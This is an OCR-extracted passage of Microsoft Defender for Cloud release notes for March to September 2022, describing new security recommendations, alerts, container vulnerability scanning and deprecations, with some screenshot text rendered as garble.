Learn more about the Defender CSPM plan. 


MITRE ATT&CK framework mapping is now available also for AWS 
and GCP security recommendations 


For security analysts, it's essential to identify the potential risks associated with security 
recommendations and understand the attack vectors, so that they can efficiently prioritize their tasks. 


Defender for Cloud makes prioritization easier by mapping the Azure, AWS and GCP security 
recommendations against the MITRE ATT&CK framework. The MITRE ATT&CK framework is a globally 
accessible knowledge base of adversary tactics and techniques based on real-world observations, 


allowing customers to strengthen the secure configuration of their environments. 
The MITRE ATT&CK framework has been integrated in three ways: 


e Recommendations map to MITRE ATT&CK tactics and techniques. 
e Query MITRE ATT&CK tactics and techniques on recommendations using the Azure Resource 
Graph. 


Home > Microsoft Defender for Cloud | Recommendations 


Hardware MFA should be enabled for the "root" account 
© Exempt T Open query 


Severity Freshness interval Tactics and techniques 


| Low ®© 6 Hours Z Credential Access 
EO 


A Description 


The root account is the most privileged user in an account. MFA adds an extra |. of profction on te prompted for 


with a hardware MFA. A Hibrdware MF E SA GG 
dan zZ Credential Access Read more C? Sa aia 
Using hardware MFA for many, many accounts might create a logistical device managemefft issue. If th a 


For Le commended that you protect the root a: 


Brute Force (T1110) 


v Remediation steps 


^ Affected resources 


Unhealthy resources (5) Healthy resources (0) Not applicable resources (0) 
h AWS resources 
Name Ty AWS Account Connector name Region Resource type 
o ra 897179807893 897179807893 DetectionBugBash03 global AWS Sts Account 


Defender for Containers now supports vulnerability assessment for 
Elastic Container Registry (Preview) 


Microsoft Defender for Containers now provides agentless vulnerability assessment scanning for Elastic 
Container Registry (ECR) in Amazon AWS. Expanding on coverage for multicloud environments, 


building on the release earlier this year of advanced threat protection and Kubernetes environment 
hardening for AWS and Google GCP. The agentless model creates AWS resources in your accounts to 
scan your images without extracting images out of your AWS accounts and with no footprint on your 
workload. 


Agentless vulnerability assessment scanning for images in ECR repositories helps reduce the attack 
surface of your containerized estate by continuously scanning images to identify and manage 
container vulnerabilities. With this new release, Defender for Cloud scans container images after they're 
pushed to the repository and continually reassess the ECR container images in the registry. The 
findings are available in Microsoft Defender for Cloud as recommendations, and you can use Defender 
for Cloud's built-in automated workflows to take action on the findings, such as opening a ticket for 
fixing a high severity vulnerability in an image. 


Learn more about vulnerability assessment for Amazon ECR images. 


September 2022 


Updates in September include: 


e Suppress alerts based on Container and Kubernetes entities 

e Defender for Servers supports File Integrity Monitoring with Azure Monitor Agent 

e Legacy Assessments APIs deprecation 

e Extra recommendations added to identity 

e Removed security alerts for machines reporting to cross-tenant Log Analytics workspaces 


Suppress alerts based on Container and Kubernetes entities 


e Kubernetes Namespace 

e Kubernetes Pod 

e Kubernetes Secret 

e Kubernetes ServiceAccount 
e Kubernetes ReplicaSet 

e Kubernetes StatefulSet 

e Kubernetes DaemonSet 

e Kubernetes Job 

e Kubernetes CronJob 


Learn more about alert suppression rules. 


Defender for Servers supports File Integrity Monitoring with Azure 
Monitor Agent 


File integrity monitoring (FIM) examines operating system files and registries for changes that might 
indicate an attack. 


FIM is now available in a new version based on Azure Monitor Agent (AMA), which you can deploy 
through Defender for Cloud. 


Learn more about File Integrity Monitoring with the Azure Monitor Agent. 


Legacy Assessments APIs deprecation 
The following APls are deprecated: 


e Security Tasks 
e Security Statuses 


e Security Summaries 


These three APIs exposed old formats of assessments and are replaced by the Assessments APIs and 
SubAssessments APIs. All data that is exposed by these legacy APIs are also available in the new APIs. 


Extra recommendations added to identity 


Defender for Cloud's recommendations for improving the management of users and accounts. 


New recommendations 
The new release contains the following capabilities: 


e Extended evaluation scope — Coverage has been improved for identity accounts without MFA 
and external accounts on Azure resources (instead of subscriptions only) which allows your 


security administrators to view role assignments per account. 


e Improved freshness interval - The identity recommendations now have a freshness interval of 12 


hours. 


e Account exemption capability - Defender for Cloud has many features you can use to customize 
your experience and ensure that your secure score reflects your organization's security priorities. 


For example, you can exempt resources and recommendations from your secure score. 


This update allows you to exempt specific accounts from evaluation with the six 
recommendations listed in the following table. 


Typically, you'd exempt emergency “break glass” accounts from MFA recommendations, because 
such accounts are often deliberately excluded from an organization's MFA requirements. 
Alternatively, you might have external accounts that you'd like to permit access to, that don't 
have MFA enabled. 


Q Tip 


When you exempt an account, it won't be shown as unhealthy and also won't cause a 
subscription to appear unhealthy. 


Recommendation Assessment key 


Accounts with owner permissions on Azure resources should be MFA 6240402e-f77c-46fa-9060- 
enabled a7ce53997754 


Recommendation 


Accounts with write permissions on Azure resources should be MFA 
enabled 


Accounts with read permissions on Azure resources should be MFA 
enabled 


Guest accounts with owner permissions on Azure resources should be 
removed 


Guest accounts with write permissions on Azure resources should be 
removed 


Guest accounts with read permissions on Azure resources should be 
removed 


Blocked accounts with owner permissions on Azure resources should 
be removed 


Blocked accounts with read and write permissions on Azure resources 
should be removed 


Assessment key 


c0cb17b2-0607-48a7-b0e0- 
903ed22de39b 


dabc9bc4-b8a8-45bd-9a5a- 
43000df8aaic 


20606e75-05c4-48c0-9d97- 
add6daa2109a 


0354476c-a12a-4fcc-a79d- 
fOab/7ffffdbb 


fde1c0c9-0fd2-4ecc-87b5- 
98956cbc1095 


050ac097-3dda-4d24-ab6d- 
82568e7a50cf 


1ff0b4c9-ed56-4de6-be9c- 
d7ab39645926 


The recommendations although in preview, will appear next to the recommendations that are currently 
in GA. 


Removed security alerts for machines reporting to cross-tenant 
Log Analytics workspaces 


In the past, Defender for Cloud let you choose the workspace that your Log Analytics agents report to. 
When a machine belonged to one tenant (“Tenant A”) but its Log Analytics agent reported to a 
workspace in a different tenant (“Tenant B”), security alerts about the machine were reported to the 
first tenant (“Tenant A”). 


With this change, alerts on machines connected to Log Analytics workspace in a different tenant no 
longer appear in Defender for Cloud. 


If you want to continue receiving the alerts in Defender for Cloud, connect the Log Analytics agent of 
the relevant machines to the workspace in the same tenant as the machine. 


Learn more about security alerts. 


August 2022 


Updates in August include: 


e Vulnerabilities for running images are now visible with Defender for Containers on your Windows 
containers 

e Azure Monitor Agent integration now in preview 

e Deprecated VM alerts regarding suspicious activity related to a Kubernetes cluster 


Vulnerabilities for running images are now visible with Defender 
for Containers on your Windows containers 


Defender for Containers now shows vulnerabilities for running Windows containers. 


When vulnerabilities are detected, Defender for Cloud generates the following security 
recommendation listing the detected issues: Running container images should have vulnerability 
findings resolved’. 


Learn more about viewing vulnerabilities for running images. 


Azure Monitor Agent integration now in preview 


Defender for Cloud now includes preview support for the Azure Monitor Agent (AMA). AMA is 
intended to replace the legacy Log Analytics agent (also referred to as the Microsoft Monitoring Agent 
(MMA)), which is on a path to deprecation. AMA provides many benefits over legacy agents. 


In Defender for Cloud, when you enable auto provisioning for AMA, the agent is deployed on existing 
and new VMs and Azure Arc-enabled machines that are detected in your subscriptions. If Defenders 
for Cloud plans are enabled, AMA collects configuration information and event logs from Azure VMs 
and Azure Arc machines. The AMA integration is in preview, so we recommend using it in test 


environments, rather than in production environments. 


Deprecated VM alerts regarding suspicious activity related to a 
Kubernetes cluster 


The following table lists the alerts that were deprecated: 


Alert name Description Tactics Severity 
Docker build operation Machine logs indicate a build operation of a Defense Evasion Low 
detected on a Kubernetes container image on a Kubernetes node. While this 

node behavior might be legitimate, attackers might build 

(VM_ImageBuildOnNode) their malicious images locally to avoid detection. 

Suspicious request to Machine logs indicate that a suspicious request LateralMovement Medium 
Kubernetes API was made to the Kubernetes API. The request was 

(VM_KubernetesAPI) sent from a Kubernetes node, possibly from one of 


the containers running in the node. Although this 
behavior can be intentional, it might indicate that 
the node is running a compromised container. 


SSH server is running inside Machine logs indicate that an SSH server is running Execution Medium 
a container inside a Docker container. While this behavior can 
(VM_ContainerSSH) be intentional, it frequently indicates that a 


container is misconfigured or breached. 


These alerts are used to notify a user about suspicious activity connected to a Kubernetes cluster. The 
alerts will be replaced with matching alerts that are part of the Microsoft Defender for Cloud Container 
alerts (K8S.NODE_ImageBuildOnNode, K8S.NODE_ KubernetesAPI and K8S.NODE_ ContainerssH) which will 


provide improved fidelity and comprehensive context to investigate and act on the alerts. Learn more 
about alerts for Kubernetes Clusters. 


Container vulnerabilities now include detailed package information 


Defender for Container's vulnerability assessment (VA) now includes detailed package information for 
each finding, including: package name, package type, path, installed version, and fixed version. The 
package information lets you find vulnerable packages so you can remediate the vulnerability or 
remove the package. 


This detailed package information is available for new scans of images. 


Microsoft Azure Ø Search resources, services, and docs (G+/) EI R fad £63 & chrisqpublic@contoso.c... 
CONTOSO, LTD. (CONTOSO, LTD... 


Home > Microsoft Defender for Cloud | Recommendations > Container registry images shoul: 986972-Java (maven) Security Update for O... x 
a24e6faa2337 


Image security health Published 8/22/2022, 3:21 PM GMT+3 
Patchable Yes 
Image Total vulnerabilities Vulnerabilities by sı Cvss 2:0. base score 3 
f: a24e6faa2337 26 High 17 m ENES CVE-2021-45046 cf 
Medium 9 m 
Low 0 ^ Remediation 


Refer to Github security advisory GHSA-7rjr-3q55-vv33 for updates and patch 
^A Essentials 


information. 
Digest : sha256:a24e6faa2337f4deaa903eb9036f01387414252d3f6649f0bfe47 1b897310... patch 

atch: 
Tags : [latest] Following are links for downloading patches to fix the vulnerabilities: 
os : Linux 


GHSA-7rjr-3q55-vv33:0rg.apache.logging.log4j:log4j-core 
Findings Disabled findings 


| D Search to filter items. ^A Additional information 
i E 


Patch Available Package type Package Name Vendor references GHSA-71jr-3q55-w33 SZ 
Yes os xz 
Package Information 
Yes os xz-libs : A r 
Name org.apache.logging.log4j:log4j-core 
Yes os python Package Type Java 
Yes os python-libs Path usr/share/logstash/logstash-core/lib/jars/log4j-core- 
a 2.14.0jar 
Yes os zlib , 
Installed Version 2.14.0 
Yes Java org.apache.logging Fixed Version 2.17.0 
Yes Java com.fasterxml jacks 
Yes Java org.apache.logging ^ Affected resources 
Yes Java org.apache.logginc 


July 2022 


Updates in July include: 


e General availability (GA) of the Cloud-native security agent for Kubernetes runtime protection 

e Defender for Container's VA adds support for the detection of language specific packages 
(Preview) 

e Protect against the Operations Management Infrastructure vulnerability CVE-2022-29149 

e Integration with Entra Permissions Management 

e Key Vault recommendations changed to "audit" 

e Deprecate API App policies for App Service 


General availability (GA) of the cloud-native security agent for 
Kubernetes runtime protection 


We're excited to share that the cloud-native security agent for Kubernetes runtime protection is now 
generally available (GA)! 


The production deployments of Kubernetes clusters continue to grow as customers continue to 
containerize their applications. To assist with this growth, the Defender for Containers team has 
developed a cloud-native Kubernetes oriented security agent. 


The new security agent is a Kubernetes DaemonSet, based on eBPF technology and is fully integrated 
into AKS clusters as part of the AKS Security Profile. 


The security agent enablement is available through auto-provisioning, recommendations flow, AKS RP 
or at scale using Azure Policy. 


You can deploy the Defender agent today on your AKS clusters. 


With this announcement, the runtime protection - threat detection (workload) is now also generally 
available. 


Learn more about the Defender for Container's feature availability. 
You can also review all available alerts. 


Note, if you're using the preview version, the AKS-AzureDefender feature flag is no longer required. 


Defender for Container's VA adds support for the detection of 
language specific packages (Preview) 


Defender for Container's vulnerability assessment (VA) is able to detect vulnerabilities in OS packages 
deployed via the OS package manager. We have now extended VA's abilities to detect vulnerabilities 


included in language specific packages. 
This feature is in preview and is only available for Linux images. 


To see all of the included language specific packages that have been added, check out Defender for 
Container's full list of features and their availability. 


Protect against the Operations Management Infrastructure 
vulnerability CVE-2022-29149 


Operations Management Infrastructure (OMI) is a collection of cloud-based services for managing on- 
premises and cloud environments from one single place. Rather than deploying and managing on- 
premises resources, OMI components are entirely hosted in Azure. 


Log Analytics integrated with Azure HDInsight running OMI version 13 requires a patch to remediate 
CVE-2022-29149 Z . Review the report about this vulnerability in the Microsoft Security Update guide Z 
for information about how to identify resources that are affected by this vulnerability and remediation 


steps. 


If you have Defender for Servers enabled with Vulnerability Assessment, you can use this workbook Z 
to identify affected resources. 


Integration with Entra Permissions Management 


Defender for Cloud has integrated with Microsoft Entra Permissions Management, a cloud 
infrastructure entitlement management (CIEM) solution that provides comprehensive visibility and 
control over permissions for any identity and any resource in Azure, AWS, and GCP. 


Each Azure subscription, AWS account, and GCP project that you onboard, will now show you a view of 
your Permission Creep Index (PCI). 


Learn more about Entra Permission Management (formerly Cloudknox) 


Key Vault recommendations changed to "audit" 


The effect for the Key Vault recommendations listed here was changed to "audit": 


Recommendation name Recommendation ID 


Validity period of certificates stored in Azure Key Vault should not exceed _—fc84abc0-eee6-4758-8372- 


12 months a7681965ca44 

Key Vault secrets should have an expiration date 14257785-9437-97fa-11ae- 
898cfb24302b 

Key Vault keys should have an expiration date laabfa0d-7585-f9f5-1d92- 
ecb40291d9f2 


Deprecate API App policies for App Service 


We deprecated the following policies to corresponding policies that already exist to include API apps: 


To be deprecated Changing to 

Ensure API app has ‘Client Certificates (Incoming App Service apps should have ‘Client Certificates 
client certificates)’ set to ‘On' (Incoming client certificates)’ enabled 

Ensure that ‘Python version’ is the latest, if App Service apps that use Python should use the latest 
used as a part of the API app Python version’ 

CORS should not allow every resource to access App Service apps should not have CORS configured to 
your API App allow every resource to access your apps 

Managed identity should be used in your API App App Service apps should use managed identity 

Remote debugging should be turned off for API App Service apps should have remote debugging turned 
Apps off 

Ensure that 'PHP version' is the latest, if used App Service apps that use PHP should use the latest 
as a part of the API app 'PHP version' 

FTPS only should be required in your API App App Service apps should require FTPS only 

Ensure that 'Java version' is the latest, if used App Service apps that use Java should use the latest 


as a part of the API app 'Java version' 


To be deprecated Changing to 


Latest TLS version should be used in your API App App Service apps should use the latest TLS version 


June 2022 


Updates in June include: 


e General availability (GA) for Microsoft Defender for Azure Cosmos DB 

e General availability (GA) of Defender for SQL on machines for AWS and GCP environments 
e Drive implementation of security recommendations to enhance your security posture 

e Filter security alerts by IP address 

e Alerts by resource group 

e Auto-provisioning of Microsoft Defender for Endpoint unified solution 

e Deprecating the "API App should only be accessible over HTTPS" policy 

e New Key Vault alerts 


General availability (GA) for Microsoft Defender for Azure Cosmos 
DB 


Microsoft Defender for Azure Cosmos DB is now generally available (GA) and supports SQL (core) API 
account types. 


This new release to GA is a part of the Microsoft Defender for Cloud database protection suite, which 
includes different types of SQL databases, and MariaDB. Microsoft Defender for Azure Cosmos DB is an 
Azure native layer of security that detects attempts to exploit databases in your Azure Cosmos DB 


accounts. 


By enabling this plan, you'll be alerted to potential SQL injections, known bad actors, suspicious access 
patterns, and potential explorations of your database through compromised identities, or malicious 
insiders. 


When potentially malicious activities are detected, security alerts are generated. These alerts provide 
details of suspicious activity along with the relevant investigation steps, remediation actions, and 


security recommendations. 


Microsoft Defender for Azure Cosmos DB continuously analyzes the telemetry stream generated by the 
Azure Cosmos DB services and crosses them with Microsoft Threat Intelligence and behavioral models 
to detect any suspicious activity. Defender for Azure Cosmos DB doesn't access the Azure Cosmos DB 
account data and doesn't have any effect on your database's performance. 


Learn more about Microsoft Defender for Azure Cosmos DB. 


With the addition of support for Azure Cosmos DB, Defender for Cloud now provides one of the most 
comprehensive workload protection offerings for cloud-based databases. Security teams and database 
owners can now have a centralized experience to manage their database security of their 
environments. 


Learn how to enable protections for your databases. 


General availability (GA) of Defender for SQL on machines for AWS 
and GCP environments 


The database protection capabilities provided by Microsoft Defender for Cloud, has added support for 
your SQL servers that are hosted in either AWS or GCP environments. 


Defender for SQL, enterprises can now protect their entire database estate, hosted in Azure, AWS, GCP 


and on-premises machines. 


Microsoft Defender for SQL provides a unified multicloud experience to view security 
recommendations, security alerts and vulnerability assessment findings for both the SQL server and the 
underlining Windows OS. 


Using the multicloud onboarding experience, you can enable and enforce databases protection for SQL 
servers running on AWS EC2, RDS Custom for SQL Server and GCP compute engine. Once you've 
enabled either of these plans, all supported resources that exist within the subscription are protected. 


Future resources created on the same subscription will also be protected. 


Learn how to protect and connect your AWS environment and your GCP organization with Microsoft 
Defender for Cloud. 


Drive implementation of security recommendations to enhance 
your security posture 


Today's increasing threats to organizations stretch the limits of security personnel to protect their 
expanding workloads. Security teams are challenged to implement the protections defined in their 
security policies. 


Now with the governance experience in preview, security teams can assign remediation of security 
recommendations to the resource owners and require a remediation schedule. They can have full 
transparency into the progress of the remediation and get notified when tasks are overdue. 


Learn more about the governance experience in Driving your organization to remediate security issues 
with recommendation governance. 


Filter security alerts by IP address 


In many cases of attacks, you want to track alerts based on the IP address of the entity involved in the 
attack. Up until now, the IP appeared only in the "Related Entities" section in the single alert pane. 
Now, you can filter the alerts in the security alerts page to see the alerts related to the IP address, and 


you can search for a specific IP address. 


Home > Microsoft Defender for Cloud 


O Microsoft Defender for Cloud | Security alerts 
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Alerts by resource group 


The ability to filter, sort and group by resource group has been added to the Security alerts page. 


A resource group column has been added to the alerts grid. 


Home > Microsoft Defender for Cloud 


Qo Microsoft Defender for Cloud | Security alerts 
st 


3 subscriptions 
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E Workflow automation 


A new filter has been added which allows you to view all of the alerts for specific resource groups. 


t7 Add filter 


Add filter a 

Filter v 
sta 
d Operator 
y Value | 0 selected Vv | 

[| Select all 
?, 01:15 PM O 
demo 

?, 01:14 PM || demo a 
>. 02:09 PM E demo 


You can now also group your alerts by resource group to view all of your alerts for each of your 
resource groups. 


Home > Microsoft Defender for Cloud 


fender for Cloud | Security alerts x 
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Auto-provisioning of Microsoft Defender for Endpoint unified 
solution 


Until now, the integration with Microsoft Defender for Endpoint (MDE) included automatic installation 
of the new MDE unified solution for machines (Azure subscriptions and multicloud connectors) with 
Defender for Servers Plan 1 enabled, and for multicloud connectors with Defender for Servers Plan 2 
enabled. Plan 2 for Azure subscriptions enabled the unified solution for Linux machines and Windows 
2019 and 2022 servers only. Windows servers 2012R2 and 2016 used the MDE legacy solution 
dependent on Log Analytics agent. 


Now, the new unified solution is available for all machines in both plans, for both Azure subscriptions 
and multicloud connectors. For Azure subscriptions with Servers Plan 2 that enabled MDE integration 
after June 20, 2022, the unified solution is enabled by default for all machines Azure subscriptions with 
the Defender for Servers Plan 2 enabled with MDE integration before June 20, 2022 can now enable 


unified solution installation for Windows servers 2012R2 and 2016 through the dedicated button in the 


Integrations page: 


Learn more about MDE integration with Defender for Servers. 


Deprecating the "API App should only be accessible over HTTPS" 
policy 


The policy API App should only be accessible over HTTPS has been deprecated. This policy is replaced 
with the Web Application should only be accessible over HTTPS policy, which has been renamed to 


App Service apps should only be accessible over HTTPS. 


To learn more about policy definitions for Azure App Service, see Azure Policy built-in definitions for 


Azure App Service. 


New Key Vault alerts 


To expand the threat protections provided by Microsoft Defender for Key Vault, we've added two new 


alerts. 


These alerts inform you of an access denied anomaly, is detected for any of your key vaults. 


Alert (alert type) Description MITRE Severity 
tactics 

Unusual access denied - User accessing A user or service principal has attempted Discovery Low 

high volume of key vaults denied access to anomalously high volume of key 

(KV_DeniedAccountVolumeAnomaly) vaults in the last 24 hours. This anomalous 


access pattern may be legitimate activity. 
Though this attempt was unsuccessful, it could 
be an indication of a possible attempt to gain 
access of key vault and the secrets contained 
within it. We recommend further 
investigations. 


Unusual access denied - Unusual user A key vault access was attempted by a user Initial Low 
accessing key vault denied that doesn't normally access it, this anomalous Access, 
(KV_UserAccessDeniedAnomaly) access pattern may be legitimate activity. Discovery 


Though this attempt was unsuccessful, it could 
be an indication of a possible attempt to gain 
access of key vault and the secrets contained 
within it. 


May 2022 


Updates in May include: 


e Multicloud settings of Servers plan are now available in connector level 
e JIT Uust-in-time) access for VMs is now available for AWS EC2 instances (Preview) 
e Add and remove the Defender agent for AKS clusters using the CLI 


Multicloud settings of Servers plan are now available in connector 
level 


There are now connector-level settings for Defender for Servers in multicloud. 


The new connector-level settings provide granularity for pricing and auto-provisioning configuration 
per connector, independently of the subscription. 


All auto-provisioning components available in the connector-level (Azure Arc, MDE, and vulnerability 
assessments) are enabled by default, and the new configuration supports both Plan 1 and Plan 2 
pricing tiers. 


Updates in the UI include a reflection of the selected pricing tier and the required components 
configured. 


Home > Microsoft Defender for Cloud 


Create GCP connector 


Google cloud 


@Project details D Select plans 


Select plans 
Select the desired capabilities, Each capability will require different access permissions and might incur charges. 
Plan name & Description Configurations Pricing Plan status 
E security posture management 


joads, De 


e Permissions: Read (SecurityAudit Free (preview) 
le to view your GCP 


ZE servers oh 
Protect your machines with threat detection and advanced defenses. Connect your GCP VMs to Azure with Azure Arc, 

@ Containers © Fully configured: 3 / 3 Free (preview) 
Provides cloud-native Kubernetes security capabilities including environment hardening, workload protection, and run-time Size swillinaunGce coe Gy On Off 


protection 


Auto-provisioning configuration x 


To prevent, detect, and respond to threats, Microsoft Defender for Cloud collects security 
data and events from your machines. Learn more 


Azure Arc agent re) On 
Connects your servers to Azure. Enable to install Azure Arc on new and existing machines 
with OS config agent. 


0 Note: Note: When Arc auto-provisioning is enabled, it will connect existing OS 
config agents on GCP’s side that are not communicating with the OS config service. 
This may lead to additional charges. For more information, see GCP documentation 


^ Additional extensions for Arc connected machines 
(preview) 


The selected extensions will be automatically provisioned on machines connected 
to Azure Arc. 


Microsoft Defender for Endpoint extension ( ©) On 


Provides comprehensive endpoint detection and response (EDR) capabilities. 
Learn more 


Vulnerability assessment €D On 


Enable vulnerability discovery and management tools for your machines. 
Learn more 


Vulnerability assessment solution 


© Microsoft threat and vulnerability management 


O Microsoft Defender for Cloud integrated Qualys scanner 


O If you've already configured auto provisioning for a BYOL solution, you'll need to 
disable it before you can configure this agent. Learn more 


Log Analytics extension OO On 
Collects security-related configurations and event logs from the machine and stores 
the data in your Log Analytics workspace for analysis. Learn more. 

Note: Settings for the Log Analytics agent are managed at the subscription level. 
For advanced configuration, edit the subscription settings. 


o Any other solutions enabled on the selected workspace will be applied to 
machines that are connected to it. For paid solutions, this could result in 
additional charges. 


Changes to vulnerability assessment 


Defender for Containers now displays vulnerabilities that have medium and low severities that aren't 
patchable. 


As part of this update, vulnerabilities that have medium and low severities are now shown, whether or 
not patches are available. This update provides maximum visibility, but still allows you to filter out 
undesired vulnerabilities by using the provided Disable rule. 


Home > Microsoft Defender for Cloud 


Disable rule x 


scription 


Container registry images should have vulnerability findings resolved 


® exempt [© disable rule] G view policy definition Y Open query V 
Unhealthy registries Severity Total vulnerabilities Vulnerabilities by severity 


A 5/5 ME OO 418 High 73 pe 


Medium 333 memm 


Low JK 


^ Description 


Container image vulnerability assessment scans your registry for security vulnerabilities and exposes detailed findings for each image. Resolving the vulnerabilitied 


V Remediation steps 


V Affected resources a > 
A Security Checks 
Disable Action 
Findings Disabled findings 
d Disable findings that match any of the following criteria: 

D Search to filter items 
Parameters 

1D Security Check Category Ds C 

198714 Ubuntu Security Notification for Python Vulnerabilities (USN-5342.... Ubuntu 
GEO 

198720 Ubuntu Security Notification for zlib Vulnerability (USN-5355-1) Ubuntu 

198702 Ubuntu Security Notification for Open Secure Sockets Layer (Ope... Ubuntu Categories © 

198685 Ubuntu Security Notification for GNU C Library Vulnerabilities (US... Ubuntu L 
Security checks © 

198725 Ubuntu Security Notification for rsync Vulnerability (USN-5359-1) Ubuntu 

198671 Ubuntu Security Notification for Expat Vulnerabilities (USN-5288-1) Ubuntu zaka 

372268 GNU Bash Privilege Escalation Vulnerability for Debian Local Minimum saei © 

178391 Debian Security Update Multiple Vulnerabilities for perl Debian None v 
LJ Non-patchable © 

178922 Debian Security Update for gmp (DLA 2837-1) Debian 

178369 Debian Security Update for tzdata (DLA 2424-1) Debian 


Justification (optional) 


@ New disable rules applied to a subscription might take up to 30 minutes to take effect, New rules on a management group might take ~ 
up to 24 hours,<br> <br> Disabling rule on the MG will apply/override any rules that may exist on underlying subscriptions 


Was this recommendation useful? © Yes © No 


Learn more about vulnerability management 


JIT (Just-in-time) access for VMs is now available for AWS EC2 
instances (Preview) 


When you connect AWS accounts, JIT will automatically evaluate the network configuration of your 
instance's security groups and recommend which instances need protection for their exposed 
management ports. This is similar to how JIT works with Azure. When you onboard unprotected EC2 
instances, JIT will block public access to the management ports, and only open them with authorized 
requests for a limited time frame. 


Learn how JIT protects your AWS EC2 instances 


Add and remove the Defender agent for AKS clusters using the CLI 


The Defender agent is required for Defender for Containers to provide the runtime protections and 
collects signals from nodes. You can now use the Azure CLI to add and remove the Defender agent for 


an AKS cluster. 


O Note 


This option is included in Azure CLI 3.7 and above. 


April 2022 


Updates in April include: 


e New Defender for Servers plans 

e Relocation of custom recommendations 

e PowerShell script to stream alerts to Splunk and QRadar 

e Deprecated the Azure Cache for Redis recommendation 

e Newalert variant for Microsoft Defender for Storage (preview) to detect exposure of sensitive 
data 

e Container scan alert title augmented with IP address reputation 

e See the activity logs that relate to a security alert 


New Defender for Servers plans 
Microsoft Defender for Servers is now offered in two incremental plans: 


e Defender for Servers Plan 2, formerly Defender for Servers 
e Defender for Servers Plan 1, provides support for Microsoft Defender for Endpoint only 


While Defender for Servers Plan 2 continues to provide protections from threats and vulnerabilities to 
your cloud and on-premises workloads, Defender for Servers Plan 1 provides endpoint protection only, 
powered by the natively integrated Defender for Endpoint. Read more about the Defender for Servers 


plans. 
If you have been using Defender for Servers until now no action is required. 


In addition, Defender for Cloud also begins gradual support for the Defender for Endpoint unified 
agent for Windows Server 2012 R2 and 2016. Defender for Servers Plan 1 deploys the new unified 
agent to Windows Server 2012 R2 and 2016 workloads. 


Relocation of custom recommendations 


Custom recommendations are those created by users and have no effect on the secure score. The 
custom recommendations can now be found under the All recommendations tab. 


Use the new "recommendation type" filter, to locate custom recommendations. 


Learn more in Create custom security initiatives and policies. 


PowerShell script to stream alerts to Splunk and IBM QRadar 


We recommend that you use Event Hubs and a built-in connector to export security alerts to Splunk 
and IBM QRadar. Now you can use a PowerShell script to set up the Azure resources needed to export 
security alerts for your subscription or tenant. 


Just download and run the PowerShell script. After you provide a few details of your environment, the 
script configures the resources for you. The script then produces output that you use in the SIEM 


platform to complete the integration. 


To learn more, see Stream alerts to Splunk and QRadar. 


Deprecated the Azure Cache for Redis recommendation 


The recommendation Azure Cache for Redis should reside within a virtual network (Preview) has 
been deprecated. We've changed our guidance for securing Azure Cache for Redis instances. We 
recommend the use of a private endpoint to restrict access to your Azure Cache for Redis instance, 


instead of a virtual network. 


New alert variant for Microsoft Defender for Storage (preview) to 
detect exposure of sensitive data 


Microsoft Defender for Storage's alerts notifies you when threat actors attempt to scan and expose, 
successfully or not, misconfigured, publicly open storage containers to try to exfiltrate sensitive 


information. 


To allow for faster triaging and response time, when exfiltration of potentially sensitive data may have 


occurred, we've released a new variation to the existing Publicly accessible storage containers have 


been exposed alert. 


The new alert, Publicly accessible storage containers with potentially sensitive data have been 
exposed, is triggered with a High severity level, after there has been a successful discovery of a publicly 


open storage container(s) with names that statistically have been found to rarely be exposed publicly, 
suggesting they might hold sensitive information. 


Alert (alert type) Description MITRE Severity 
tactic 

PREVIEW - Publicly accessible storage containers with potentially Someone has Collection High 

sensitive data have been exposed scanned your 


(Storage.Blob_OpenContainersScanning.SuccessfulDiscovery.Sensitive) Azure Storage 
account and 
exposed 
container(s) that 
allow public 
access. One or 
more of the 
exposed 
containers have 
names that 
indicate that they 
may contain 
sensitive data. 


This usually 
indicates 
reconnaissance 
by a threat actor 
that is scanning 
for misconfigured 
publicly 
accessible 
storage 
containers that 


Alert (alert type) Description MITRE Severit 
yp p y 
tactic 


may contain 
sensitive data. 


After a threat 
actor successfully 
discovers a 
container, they 
may continue by 
exfiltrating the 
data. 

vV Azure Blob 
Storage 

X Azure Files 

x Azure Data 
Lake Storage 
Gen2 


Container scan alert title augmented with IP address reputation 


An IP address's reputation can indicate whether the scanning activity originates from a known threat 
actor, or from an actor that is using the Tor network to hide their identity. Both of these indicators, 
suggest that there's malicious intent. The IP address's reputation is provided by Microsoft Threat 


Intelligence’. 


The addition of the IP address's reputation to the alert title provides a way to quickly evaluate the 
intent of the actor, and thus the severity of the threat. 


The following alerts will include this information: 
e Publicly accessible storage containers have been exposed 
e Publicly accessible storage containers with potentially sensitive data have been exposed 


e Publicly accessible storage containers have been scanned. No publicly accessible data was 


discovered 


For example, the added information to the title of the Publicly accessible storage containers have 


been exposed alert will look like this: 
è Publicly accessible storage containers have been exposed by a suspicious IP address 
e Publicly accessible storage containers have been exposed by a Tor exit node 

All of the alerts for Microsoft Defender for Storage will continue to include threat intelligence 


information in the IP entity under the alert's Related Entities section. 


See the activity logs that relate to a security alert 


As part of the actions you can take to evaluate a security alert, you can find the related platform logs in 
Inspect resource context to gain context about the affected resource. Microsoft Defender for Cloud 
identifies platform logs that are within one day of the alert. 


The platform logs can help you evaluate the security threat and identify steps that you can take to 
mitigate the identified risk. 


March 2022 


Updates in March include: 


e Global availability of Secure Score for AWS and GCP environments 

e Deprecated the recommendations to install the network traffic data collection agent 

e Defender for Containers can now scan for vulnerabilities in Windows images (preview) 

e New alert for Microsoft Defender for Storage (preview) 

e Configure email notifications settings from an alert 

e Deprecated preview alert: ARM.MCAS_ActivityFromAnonymous!|PAddresses 

e Moved the recommendation Vulnerabilities in container security configurations should be 
remediated from the secure score to best practices 

e Deprecated the recommendation to use service principals to protect your subscriptions 

e Legacy implementation of ISO 27001 replaced with new ISO 27001:2013 initiative 

e Deprecated Microsoft Defender for loT device recommendations 

e Deprecated Microsoft Defender for loT device alerts 

e Posture management and threat protection for AWS and GCP released for general availability 
(GA) 

e Registry scan for Windows images in ACR added support for national clouds 


Global availability of Secure Score for AWS and GCP environments 


The cloud security posture management capabilities provided by Microsoft Defender for Cloud, has 
now added support for your AWS and GCP environments within your Secure Score. 


Enterprises can now view their overall security posture, across various environments, such as Azure, 
AWS and GCP. 


The Secure Score page has been replaced with the Security posture dashboard. The Security posture 
dashboard allows you to view an overall combined score for all of your environments, or a breakdown 


of your security posture based on any combination of environments that you choose. 


The Recommendations page has also been redesigned to provide new capabilities such as: cloud 
environment selection, advanced filters based on content (resource group, AWS account, GCP project 
and more), improved user interface on low resolution, support for open query in resource graph, and 


more. You can learn more about your overall security posture and security recommendations. 


Deprecated the recommendations to install the network traffic 
data collection agent 


Changes in our roadmap and priorities have removed the need for the network traffic data collection 


agent. The following two recommendations and their related policies were deprecated. 


Recommendation Description Severity 


